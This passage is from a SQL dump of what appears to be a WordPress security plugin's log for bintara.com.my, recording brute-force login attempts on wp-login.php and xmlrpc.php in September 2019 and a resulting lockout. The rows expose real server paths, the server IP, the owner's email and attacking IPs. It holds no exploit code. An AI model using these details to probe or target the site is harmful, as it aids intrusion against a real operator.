Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYHt1iJ7D9Gn7wDPh8XpgAAANY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"202.154.188.12\";s:11:\"REMOTE_PORT\";s:5:\"37264\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYHt1iJ7D9Gn7wDPh8XpgAAANY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569064894.903\";s:12:\"REQUEST_TIME\";s:10:\"1569064894\";}}','notice','2019-09-21 11:21:39','2019-09-21 11:21:38',17796848,19287472,'https://bintara.com.my/test/wp-login.php',1,0,'202.154.188.12'),(25555,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYHwHkXpgmG5P@iB8kU-wAAAIs\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.151.61\";s:11:\"REMOTE_PORT\";s:5:\"48612\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYHwHkXpgmG5P@iB8kU-wAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064898.5941\";s:12:\"REQUEST_TIME\";s:10:\"1569064898\";}}','notice','2019-09-21 11:21:43','2019-09-21 11:21:42',17799864,19290456,'https://bintara.com.my/wordpress/wp-login.php',1,0,'157.230.151.61'),(25556,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:21:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:21:42\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:36:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:36:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:21:43','2019-09-21 11:21:42',17883976,19290456,'https://bintara.com.my/wordpress/wp-login.php',1,0,'157.230.151.61'),(25557,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:21:43','2019-09-21 11:21:42',18089960,19290456,'https://bintara.com.my/wordpress/wp-login.php',1,0,'157.230.151.61'),(25558,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYHxHkXpgmG5P@iB8kVBAAAAJg\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"202.154.188.12\";s:11:\"REMOTE_PORT\";s:5:\"40270\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYHxHkXpgmG5P@iB8kVBAAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569064902.665\";s:12:\"REQUEST_TIME\";s:10:\"1569064902\";}}','notice','2019-09-21 11:21:47','2019-09-21 11:21:46',18315424,19612920,'https://bintara.com.my/test/xmlrpc.php',1,0,'202.154.188.12'),(25559,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYHwbfBTP0kPOVnb8jqIgAAAEE\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"194.244.33.34\";s:11:\"REMOTE_PORT\";s:5:\"57842\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYHwbfBTP0kPOVnb8jqIgAAAEE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064902.6329\";s:12:\"REQUEST_TIME\";s:10:\"1569064902\";}}','notice','2019-09-21 11:21:47','2019-09-21 11:21:46',18315912,19612376,'https://bintara.com.my/blog/xmlrpc.php',1,0,'194.244.33.34'),(25560,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYH1nkXpgmG5P@iB8kVIAAAAI0\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.151.61\";s:11:\"REMOTE_PORT\";s:5:\"51544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYH1nkXpgmG5P@iB8kVIAAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064923.4542\";s:12:\"REQUEST_TIME\";s:10:\"1569064923\";}}','notice','2019-09-21 11:22:08','2019-09-21 11:22:07',18314320,19610504,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'157.230.151.61'),(25561,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIC3kXpgmG5P@iB8kVaAAAAIg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.205.104\";s:11:\"REMOTE_PORT\";s:5:\"42315\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIC3kXpgmG5P@iB8kVaAAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569064977.536\";s:12:\"REQUEST_TIME\";s:10:\"1569064977\";}}','notice','2019-09-21 11:23:02','2019-09-21 11:23:01',17800608,19290248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'51.75.205.104'),(25562,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIFzDrcQxTmGrCWuaLHQAAAck\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.205.104\";s:11:\"REMOTE_PORT\";s:5:\"43350\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYIFzDrcQxTmGrCWuaLHQAAAck\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064985.9299\";s:12:\"REQUEST_TIME\";s:10:\"1569064985\";}}','notice','2019-09-21 11:23:07','2019-09-21 11:23:06',18313120,19608960,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'51.75.205.104'),(25563,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYIR1iJ7D9Gn7wDPh8YKwAAAMs\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"138.197.146.132\";s:11:\"REMOTE_PORT\";s:5:\"52666\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1